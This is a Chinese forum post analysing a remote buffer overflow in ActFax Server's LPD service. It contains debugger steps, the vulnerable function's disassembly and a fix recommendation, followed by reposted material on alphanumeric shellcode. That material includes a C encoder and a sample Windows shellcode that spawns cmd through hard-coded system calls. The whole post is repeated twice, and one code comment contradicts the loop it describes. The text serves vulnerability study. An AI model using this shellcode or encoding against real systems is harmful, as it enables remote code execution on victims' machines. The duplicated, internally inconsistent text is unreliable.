[原创]ActFax Server (LPDLPR) Remote Buffer Overflow Exploit分析
2011-2-21 21:37 6167
标 题: ActFax Server (LPDLPR) Remote Buffer Overflow Exploit分析
作 者: kkmylove
时 间: 2011-02-21
链 接: http://bbs.pediy.com/showthread.php?p=927998#post927998
●
漏洞来源:
http://www.exploit-db.com/exploits/16176/
●
bug函数定位
在004A4B7D下断点,运行程序(F9),调用漏洞利用程序,
这时程序断在 004A4B7D。此时查看栈窗口,往下翻找能返回到程序自身领空(ActFax 模块)的返回地址——要翻很远才能找到一个,这就是做栈回溯的起点。
这里我找到
在call处下断点
重新启动程序,然后启动poc程序,程序断在call处。
Ctrl+F8运行
等一会,程序断在了004A4B7D
按小键盘上的“-”减号
出现代码如图所示
选中call一行,直接回车,来到0046CEA0处。即为导致溢出的函数。
●
Bug函数分析
导致溢出的函数反汇编如下:
0046CEA0 /$ 81EC 00020000 sub esp,0x200
0046CEA6 |. 8B8424 080200>mov eax,dword ptr ss:[esp+0x208]
0046CEAD |. 53 push ebx
0046CEAE |. 8B9C24 140200>mov ebx,dword ptr ss:[esp+0x214]
0046CEB5 |. 55 push ebp
0046CEB6 |. 56 push esi
0046CEB7 |. 8B35 94C35100 mov esi,dword ptr ds:[<&KERNEL32.lstrcpy>; kernel32.lstrcpyA
0046CEBD |. 57 push edi
0046CEBE |. 8BBC24 240200>mov edi,dword ptr ss:[esp+0x224]
0046CEC5 |. 68 68FE5300 push ActFax.0053FE68 ; /String2 = ""
0046CECA |. 50 push eax ; |String1
0046CECB |. C707 00000000 mov dword ptr ds:[edi],0x0 ; |
0046CED1 |. C703 00000000 mov dword ptr ds:[ebx],0x0 ; |
0046CED7 |. FFD6 call esi ; \lstrcpyA
0046CED9 |. 8BAC24 1C0200>mov ebp,dword ptr ss:[esp+0x21C]
0046CEE0 |. 68 68FE5300 push ActFax.0053FE68 ; /String2 = ""
0046CEE5 |. 55 push ebp ; |String1
0046CEE6 |. FFD6 call esi ; \lstrcpyA
0046CEE8 |. 8B8C24 140200>mov ecx,dword ptr ss:[esp+0x214]
0046CEEF |. 8D9424 100100>lea edx,dword ptr ss:[esp+0x110]
0046CEF6 |. 51 push ecx ; /String2
0046CEF7 |. 52 push edx ; |String1
0046CEF8 |. FFD6 call esi ; \lstrcpyA
0046CEFA |. 8D8424 100100>lea eax,dword ptr ss:[esp+0x110]
0046CF01 |. 50 push eax
0046CF02 |. E8 D94A0900 call ActFax.005019E0
0046CF07 |. A1 84865200 mov eax,dword ptr ds:[0x528684]
0046CF0C |. 83C4 04 add esp,0x4
0046CF0F |. 85C0 test eax,eax
0046CF11 |. 75 40 jnz XActFax.0046CF53
0046CF13 |. 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10]
0046CF17 |. 68 88865200 push ActFax.00528688
0046CF1C |. 51 push ecx
0046CF1D |. FFD6 call esi
0046CF1F |. 8D5424 10 lea edx,dword ptr ss:[esp+0x10]
0046CF23 |. 52 push edx
0046CF24 |. E8 B74A0900 call ActFax.005019E0
0046CF29 |. 83C4 04 add esp,0x4
0046CF2C |. 8D4424 10 lea eax,dword ptr ss:[esp+0x10]
0046CF30 |. 8D8C24 100100>lea ecx,dword ptr ss:[esp+0x110]
0046CF37 |. 50 push eax ; /String2
0046CF38 |. 51 push ecx ; |String1
0046CF39 |. FF15 34C35100 call dword ptr ds:[<&KERNEL32.lstrcmpA>] ; \lstrcmpA
0046CF3F |. 85C0 test eax,eax
0046CF41 |. 75 10 jnz XActFax.0046CF53
0046CF43 |. 5F pop edi
0046CF44 |. 5E pop esi
0046CF45 |. 5D pop ebp
0046CF46 |. B8 01000000 mov eax,0x1
0046CF4B |. 5B pop ebx
0046CF4C |. 81C4 00020000 add esp,0x200
0046CF52 |. C3 retn
0046CF53 |> \A1 88875200 mov eax,dword ptr ds:[0x528788]
0046CF58 |. 85C0 test eax,eax
0046CF5A |. 74 52 je XActFax.0046CFAE
0046CF5C |. 8B35 DC385400 mov esi,dword ptr ds:[0x5438DC]
0046CF62 |. 85F6 test esi,esi
0046CF64 |. 74 48 je XActFax.0046CFAE
0046CF66 |> 6A 00 /push 0x0
0046CF68 |. 8D5424 14 |lea edx,dword ptr ss:[esp+0x14]
0046CF6C |. 68 00010000 |push 0x100
0046CF71 |. 52 |push edx
0046CF72 |. 6A 01 |push 0x1
0046CF74 |. 6A 01 |push 0x1
0046CF76 |. 56 |push esi
0046CF77 |. E8 944C0100 |call ActFax.00481C10
0046CF7C |. 83C4 18 |add esp,0x18
0046CF7F |. 85C0 |test eax,eax
0046CF81 |. 74 24 |je XActFax.0046CFA7
0046CF83 |. 8D4424 10 |lea eax,dword ptr ss:[esp+0x10]
0046CF87 |. 50 |push eax
0046CF88 |. E8 534A0900 |call ActFax.005019E0
0046CF8D |. 83C4 04 |add esp,0x4
0046CF90 |. 8D4C24 10 |lea ecx,dword ptr ss:[esp+0x10]
0046CF94 |. 8D9424 100100>|lea edx,dword ptr ss:[esp+0x110]
0046CF9B |. 51 |push ecx ; /String2
0046CF9C |. 52 |push edx ; |String1
0046CF9D |. FF15 34C35100 |call dword ptr ds:[<&KERNEL32.lstrcmpA>] ; \lstrcmpA
0046CFA3 |. 85C0 |test eax,eax
0046CFA5 |. 74 17 |je XActFax.0046CFBE
0046CFA7 |> 8B76 20 |mov esi,dword ptr ds:[esi+0x20]
0046CFAA |. 85F6 |test esi,esi
0046CFAC |.^ 75 B8 \jnz XActFax.0046CF66
0046CFAE |> A1 84865200 mov eax,dword ptr ds:[0x528684]
0046CFB3 |. 5F pop edi
0046CFB4 |. 5E pop esi
0046CFB5 |. 5D pop ebp
0046CFB6 |. 5B pop ebx
0046CFB7 |. 81C4 00020000 add esp,0x200
0046CFBD |. C3 retn
程序里大量使用 lstrcpyA,并且没有对源串长度做任何检查,漏洞由此产生。关键是 0046CEF8 处的这次拷贝:源串取自 [esp+0x214],按此处的栈布局(sub esp,0x200 之后又压入了 4 个寄存器,esp 比进入函数时低 0x210)它正是本函数的第 1 个参数(从 PoC 触发崩溃可见其内容来自网络请求,攻击者可控);目标是 [esp+0x110],即本函数 0x200 字节局部区中偏移 0x100 处的栈缓冲区,距返回地址只有 0x100 = 256 字节。lstrcpyA 只以 NUL 为界,源串一旦超过 256 字节,返回地址就会被覆盖。修复应改用带长度上限的拷贝(如 lstrcpynA,或 strncpy 后显式补 NUL),并在拷贝前校验长度。
0046CEE8 |. 8B8C24 140200>mov ecx,dword ptr ss:[esp+0x214]
0046CEEF |. 8D9424 100100>lea edx,dword ptr ss:[esp+0x110]
0046CEF6 |. 51 push ecx ; /String2
0046CEF7 |. 52 push edx ; |String1
0046CEF8 |. FFD6 call esi ; \lstrcpyA
0046CEFA |. 8D8424 100100>lea eax,dword ptr ss:[esp+0x110]
0046CF01 |. 50 push eax
●
Bug利用
漏洞利用程序使用了纯字母的 shellcode,本人能力有限,就不在此误人子弟了。收集了一些字母 shellcode 的资料,分享给大家。
转:http://www.7747.net/kf/201012/80407.html
算法描述:把每个字节拆成高 4 位和低 4 位两个半字节,各自加上一个 key(例如 0x41),变成两个可打印字符;下面代码中先输出高半字节,再输出低半字节(在 x86 上的 GCC/MSVC 下,先声明的位域 o1 落在低 4 位,o0 落在高 4 位)。
每个字节的取值范围是 0x00-0xFF(2^8 = 256 种),拆成两个半字节后每个部分只有 2^4 = 16 种取值(0x0-0xF)。
加上一个适当的 key:以 0x41 为例,每个半字节 0x0-0xF 映射到 0x41-0x50,即 ASCII 的 A-P(16 个值,而不是 A-Q),所以编码结果全部是 A-P 的大写字母。
当然,在会被转换成小写的时候(如 Cmail hello 溢出漏洞),选用 0x61 为 key,就得到 a-p 的全小写范围。需要注意:这样得到的只是 payload 的可打印编码,本身不可执行,真正运行时还需要一段同样由可打印字符构成的解码存根(如附件中 alpha2 这类编码器所生成的)先把它还原成原始 shellcode。
算法代码示例(C++)
base16.cpp:
#include <stdio.h>
/* One byte viewed as two 4-bit fields. Which field lands in the high or low
 * nibble is implementation-defined (C11 6.7.2.1: the order of allocation of
 * bit-fields within a unit); with GCC/MSVC on x86 the first-declared field
 * `o1` is the low nibble and `o0` the high nibble, which is what main()
 * relies on when it prints o0 before o1.
 * NOTE(review): the tag `_Byte_base16` (underscore + uppercase) is a
 * reserved identifier; a portable version would use shifts/masks and not
 * need this struct at all. */
typedef struct _Byte_base16
{
unsigned o1 : 4;
unsigned o0 : 4;
}Byte_base16, *PByte_base16;
/* Sample payload fed to the encoder below. From the bytes pushed it builds
 * the strings "msvcrt" ("rt" via ax, "msvc" via the push) and "cmd" ("cm" via
 * dx plus the 'd' stored at [esp+2]) on the stack before the first two
 * `call eax`. The three call targets (0x77e705cf, 0x78018ebf, 0x77e6e01a) are
 * hard-coded absolute addresses, so this payload only works on the specific
 * Windows build / DLL versions they were taken from (presumably
 * LoadLibraryA / system / ExitProcess — confirm against the target's export
 * tables before reuse). This particular sequence contains no 0x00 byte,
 * which is the only reason the NUL-terminated loop in main() copies it
 * completely. */
unsigned char shellcode[] =
"\x33\xC0" // xor eax, eax
"\x66\xB8\x72\x74" // mov ax, 7472
"\x50" // push eax
"\x68\x6D\x73\x76\x63" // push 6376736D
"\x54" // push esp
"\xB8\xcf\x05\xe7\x77" // mov eax, 0x77e705cf
"\xFF\xD0" // call eax
"\x99" // cdq
"\x66\xBA\x63\x6D" // mov dx, 6D63
"\x52" // push edx
"\xC6\x44\x24\x02\x64" // mov byte ptr [esp+2], 64
"\x54" // push esp
"\xB8\xbf\x8e\x01\x78" // mov eax, 0x78018ebf
"\xFF\xD0" // call eax
"\x99" // cdq
"\x52" // push edx
"\xB8\x1a\xe0\xe6\x77" // mov eax, 0x77e6e01a
"\xFF\xD0"; // call eax
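/* Encode one byte as two printable characters: high nibble first, then low
 * nibble, each offset by `key`. Shifts and masks make the nibble order
 * explicit instead of depending on the compiler's bit-field layout. */
static void print_base16_byte(unsigned char b, unsigned char key)
{
    putchar((b >> 4) + key);
    putchar((b & 0x0F) + key);
}

/* Print `shellcode` as a printable base-16 string (with key 0x41 the output
 * alphabet is A..P). The output is only an encoding: it needs a matching
 * printable decoder stub in front of it to execute. Returns 0. */
int main(int argc,char* argv[])
{
    unsigned char key = 0x41; /* 'A': nibble 0x0..0xF -> 'A'..'P' */
    (void)argc;
    (void)argv;
    /* Walk the array by its size rather than until the first NUL: a payload
     * that contains a 0x00 byte would otherwise be truncated silently. The -1
     * drops the terminator the string-literal initializer appends. */
    for (size_t i = 0; i < sizeof shellcode - 1; i++) {
        print_base16_byte(shellcode[i], key);
    }
    return 0;
}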
poc
16176.rar
漏洞程序
actfax_setup_en.part1.rar
actfax_setup_en.part2.rar
actfax_setup_en.part3.rar
actfax_setup_en.part4.rar
字母shellcode资料
alpha2.rar
黑防2008.4.rar
作 者: kkmylove
时 间: 2011-02-21
链 接: http://bbs.pediy.com/showthread.php?p=927998#post927998
●
http://www.exploit-db.com/exploits/16176/
●
在004A4B7D下断点,运行程序(F9),调用漏洞利用程序,
这时程序断在 004A4B7D。此时查看栈窗口,往下翻找能返回到程序自身领空(ActFax 模块)的返回地址——要翻很远才能找到一个,这就是做栈回溯的起点。
这里我找到
在call处下断点
重新启动程序,然后启动poc程序,程序断在call处。
Ctrl+F8运行
等一会,程序断在了004A4B7D
按小键盘上的“-”减号
出现代码如图所示
选中call一行,直接回车,来到0046CEA0处。即为导致溢出的函数。
●
导致溢出的函数反汇编如下:
0046CEA0 /$ 81EC 00020000 sub esp,0x200
0046CEA6 |. 8B8424 080200>mov eax,dword ptr ss:[esp+0x208]
0046CEAD |. 53 push ebx
0046CEAE |. 8B9C24 140200>mov ebx,dword ptr ss:[esp+0x214]
0046CEB5 |. 55 push ebp
0046CEB6 |. 56 push esi
0046CEB7 |. 8B35 94C35100 mov esi,dword ptr ds:[<&KERNEL32.lstrcpy>; kernel32.lstrcpyA
0046CEBD |. 57 push edi
0046CEBE |. 8BBC24 240200>mov edi,dword ptr ss:[esp+0x224]
0046CEC5 |. 68 68FE5300 push ActFax.0053FE68 ; /String2 = ""
0046CECA |. 50 push eax ; |String1
0046CECB |. C707 00000000 mov dword ptr ds:[edi],0x0 ; |
0046CED1 |. C703 00000000 mov dword ptr ds:[ebx],0x0 ; |
0046CED7 |. FFD6 call esi ; \lstrcpyA
0046CED9 |. 8BAC24 1C0200>mov ebp,dword ptr ss:[esp+0x21C]
0046CEE0 |. 68 68FE5300 push ActFax.0053FE68 ; /String2 = ""
0046CEE5 |. 55 push ebp ; |String1
0046CEE6 |. FFD6 call esi ; \lstrcpyA
0046CEE8 |. 8B8C24 140200>mov ecx,dword ptr ss:[esp+0x214]
0046CEEF |. 8D9424 100100>lea edx,dword ptr ss:[esp+0x110]
0046CEF6 |. 51 push ecx ; /String2
0046CEF7 |. 52 push edx ; |String1
0046CEF8 |. FFD6 call esi ; \lstrcpyA
0046CEFA |. 8D8424 100100>lea eax,dword ptr ss:[esp+0x110]
0046CF01 |. 50 push eax
0046CF02 |. E8 D94A0900 call ActFax.005019E0
0046CF07 |. A1 84865200 mov eax,dword ptr ds:[0x528684]
0046CF0C |. 83C4 04 add esp,0x4
0046CF0F |. 85C0 test eax,eax
0046CF11 |. 75 40 jnz XActFax.0046CF53
0046CF13 |. 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10]
0046CF17 |. 68 88865200 push ActFax.00528688
0046CF1C |. 51 push ecx
0046CF1D |. FFD6 call esi
0046CF1F |. 8D5424 10 lea edx,dword ptr ss:[esp+0x10]
0046CF23 |. 52 push edx
0046CF24 |. E8 B74A0900 call ActFax.005019E0
0046CF29 |. 83C4 04 add esp,0x4
0046CF2C |. 8D4424 10 lea eax,dword ptr ss:[esp+0x10]
0046CF30 |. 8D8C24 100100>lea ecx,dword ptr ss:[esp+0x110]
0046CF37 |. 50 push eax ; /String2
0046CF38 |. 51 push ecx ; |String1
0046CF39 |. FF15 34C35100 call dword ptr ds:[<&KERNEL32.lstrcmpA>] ; \lstrcmpA
0046CF3F |. 85C0 test eax,eax
0046CF41 |. 75 10 jnz XActFax.0046CF53
0046CF43 |. 5F pop edi
0046CF44 |. 5E pop esi
0046CF45 |. 5D pop ebp
0046CF46 |. B8 01000000 mov eax,0x1
0046CF4B |. 5B pop ebx
0046CF4C |. 81C4 00020000 add esp,0x200
0046CF52 |. C3 retn
0046CF53 |> \A1 88875200 mov eax,dword ptr ds:[0x528788]
0046CF58 |. 85C0 test eax,eax
0046CF5A |. 74 52 je XActFax.0046CFAE
0046CF5C |. 8B35 DC385400 mov esi,dword ptr ds:[0x5438DC]
0046CF62 |. 85F6 test esi,esi
0046CF64 |. 74 48 je XActFax.0046CFAE
0046CF66 |> 6A 00 /push 0x0
0046CF68 |. 8D5424 14 |lea edx,dword ptr ss:[esp+0x14]
0046CF6C |. 68 00010000 |push 0x100
0046CF71 |. 52 |push edx
0046CF72 |. 6A 01 |push 0x1
0046CF74 |. 6A 01 |push 0x1
0046CF76 |. 56 |push esi
0046CF77 |. E8 944C0100 |call ActFax.00481C10
0046CF7C |. 83C4 18 |add esp,0x18
0046CF7F |. 85C0 |test eax,eax
0046CF81 |. 74 24 |je XActFax.0046CFA7
0046CF83 |. 8D4424 10 |lea eax,dword ptr ss:[esp+0x10]
0046CF87 |. 50 |push eax
0046CF88 |. E8 534A0900 |call ActFax.005019E0
0046CF8D |. 83C4 04 |add esp,0x4
0046CF90 |. 8D4C24 10 |lea ecx,dword ptr ss:[esp+0x10]
0046CF94 |. 8D9424 100100>|lea edx,dword ptr ss:[esp+0x110]
0046CF9B |. 51 |push ecx ; /String2
0046CF9C |. 52 |push edx ; |String1
0046CF9D |. FF15 34C35100 |call dword ptr ds:[<&KERNEL32.lstrcmpA>] ; \lstrcmpA
0046CFA3 |. 85C0 |test eax,eax
0046CFA5 |. 74 17 |je XActFax.0046CFBE
0046CFA7 |> 8B76 20 |mov esi,dword ptr ds:[esi+0x20]
0046CFAA |. 85F6 |test esi,esi
0046CFAC |.^ 75 B8 \jnz XActFax.0046CF66
0046CFAE |> A1 84865200 mov eax,dword ptr ds:[0x528684]
0046CFB3 |. 5F pop edi
0046CFB4 |. 5E pop esi
0046CFB5 |. 5D pop ebp
0046CFB6 |. 5B pop ebx
0046CFB7 |. 81C4 00020000 add esp,0x200
0046CFBD |. C3 retn
程序里大量使用 lstrcpyA,并且没有对源串长度做任何检查,漏洞由此产生。关键是 0046CEF8 处的这次拷贝:源串取自 [esp+0x214],按此处的栈布局(sub esp,0x200 之后又压入了 4 个寄存器,esp 比进入函数时低 0x210)它正是本函数的第 1 个参数(从 PoC 触发崩溃可见其内容来自网络请求,攻击者可控);目标是 [esp+0x110],即本函数 0x200 字节局部区中偏移 0x100 处的栈缓冲区,距返回地址只有 0x100 = 256 字节。lstrcpyA 只以 NUL 为界,源串一旦超过 256 字节,返回地址就会被覆盖。修复应改用带长度上限的拷贝(如 lstrcpynA,或 strncpy 后显式补 NUL),并在拷贝前校验长度。
0046CEE8 |. 8B8C24 140200>mov ecx,dword ptr ss:[esp+0x214]
0046CEEF |. 8D9424 100100>lea edx,dword ptr ss:[esp+0x110]
0046CEF6 |. 51 push ecx ; /String2
0046CEF7 |. 52 push edx ; |String1
0046CEF8 |. FFD6 call esi ; \lstrcpyA
0046CEFA |. 8D8424 100100>lea eax,dword ptr ss:[esp+0x110]
0046CF01 |. 50 push eax
●
漏洞利用程序使用了纯字母的 shellcode,本人能力有限,就不在此误人子弟了。收集了一些字母 shellcode 的资料,分享给大家。
转:http://www.7747.net/kf/201012/80407.html
算法描述:把每个字节拆成高 4 位和低 4 位两个半字节,各自加上一个 key(例如 0x41),变成两个可打印字符;下面代码中先输出高半字节,再输出低半字节(在 x86 上的 GCC/MSVC 下,先声明的位域 o1 落在低 4 位,o0 落在高 4 位)。
每个字节的取值范围是 0x00-0xFF(2^8 = 256 种),拆成两个半字节后每个部分只有 2^4 = 16 种取值(0x0-0xF)。
加上一个适当的 key:以 0x41 为例,每个半字节 0x0-0xF 映射到 0x41-0x50,即 ASCII 的 A-P(16 个值,而不是 A-Q),所以编码结果全部是 A-P 的大写字母。
当然,在会被转换成小写的时候(如 Cmail hello 溢出漏洞),选用 0x61 为 key,就得到 a-p 的全小写范围。需要注意:这样得到的只是 payload 的可打印编码,本身不可执行,真正运行时还需要一段同样由可打印字符构成的解码存根(如附件中 alpha2 这类编码器所生成的)先把它还原成原始 shellcode。
算法代码示例(C++)
base16.cpp:
#include <stdio.h>
/* One byte viewed as two 4-bit fields. Which field lands in the high or low
 * nibble is implementation-defined (C11 6.7.2.1: the order of allocation of
 * bit-fields within a unit); with GCC/MSVC on x86 the first-declared field
 * `o1` is the low nibble and `o0` the high nibble, which is what main()
 * relies on when it prints o0 before o1.
 * NOTE(review): the tag `_Byte_base16` (underscore + uppercase) is a
 * reserved identifier; a portable version would use shifts/masks and not
 * need this struct at all. */
typedef struct _Byte_base16
{
unsigned o1 : 4;
unsigned o0 : 4;
}Byte_base16, *PByte_base16;
/* Sample payload fed to the encoder below. From the bytes pushed it builds
 * the strings "msvcrt" ("rt" via ax, "msvc" via the push) and "cmd" ("cm" via
 * dx plus the 'd' stored at [esp+2]) on the stack before the first two
 * `call eax`. The three call targets (0x77e705cf, 0x78018ebf, 0x77e6e01a) are
 * hard-coded absolute addresses, so this payload only works on the specific
 * Windows build / DLL versions they were taken from (presumably
 * LoadLibraryA / system / ExitProcess — confirm against the target's export
 * tables before reuse). This particular sequence contains no 0x00 byte,
 * which is the only reason the NUL-terminated loop in main() copies it
 * completely. */
unsigned char shellcode[] =
"\x33\xC0" // xor eax, eax
"\x66\xB8\x72\x74" // mov ax, 7472
"\x50" // push eax
"\x68\x6D\x73\x76\x63" // push 6376736D
"\x54" // push esp
"\xB8\xcf\x05\xe7\x77" // mov eax, 0x77e705cf
"\xFF\xD0" // call eax
"\x99" // cdq
"\x66\xBA\x63\x6D" // mov dx, 6D63
"\x52" // push edx
"\xC6\x44\x24\x02\x64" // mov byte ptr [esp+2], 64
"\x54" // push esp
"\xB8\xbf\x8e\x01\x78" // mov eax, 0x78018ebf
"\xFF\xD0" // call eax
"\x99" // cdq
"\x52" // push edx
"\xB8\x1a\xe0\xe6\x77" // mov eax, 0x77e6e01a
"\xFF\xD0"; // call eax
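/* Encode one byte as two printable characters: high nibble first, then low
 * nibble, each offset by `key`. Shifts and masks make the nibble order
 * explicit instead of depending on the compiler's bit-field layout. */
static void print_base16_byte(unsigned char b, unsigned char key)
{
    putchar((b >> 4) + key);
    putchar((b & 0x0F) + key);
}

/* Print `shellcode` as a printable base-16 string (with key 0x41 the output
 * alphabet is A..P). The output is only an encoding: it needs a matching
 * printable decoder stub in front of it to execute. Returns 0. */
int main(int argc,char* argv[])
{
    unsigned char key = 0x41; /* 'A': nibble 0x0..0xF -> 'A'..'P' */
    (void)argc;
    (void)argv;
    /* Walk the array by its size rather than until the first NUL: a payload
     * that contains a 0x00 byte would otherwise be truncated silently. The -1
     * drops the terminator the string-literal initializer appends. */
    for (size_t i = 0; i < sizeof shellcode - 1; i++) {
        print_base16_byte(shellcode[i], key);
    }
    return 0;
}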
poc
16176.rar
漏洞程序
actfax_setup_en.part1.rar
actfax_setup_en.part2.rar
actfax_setup_en.part3.rar
actfax_setup_en.part4.rar
字母shellcode资料
alpha2.rar
黑防2008.4.rar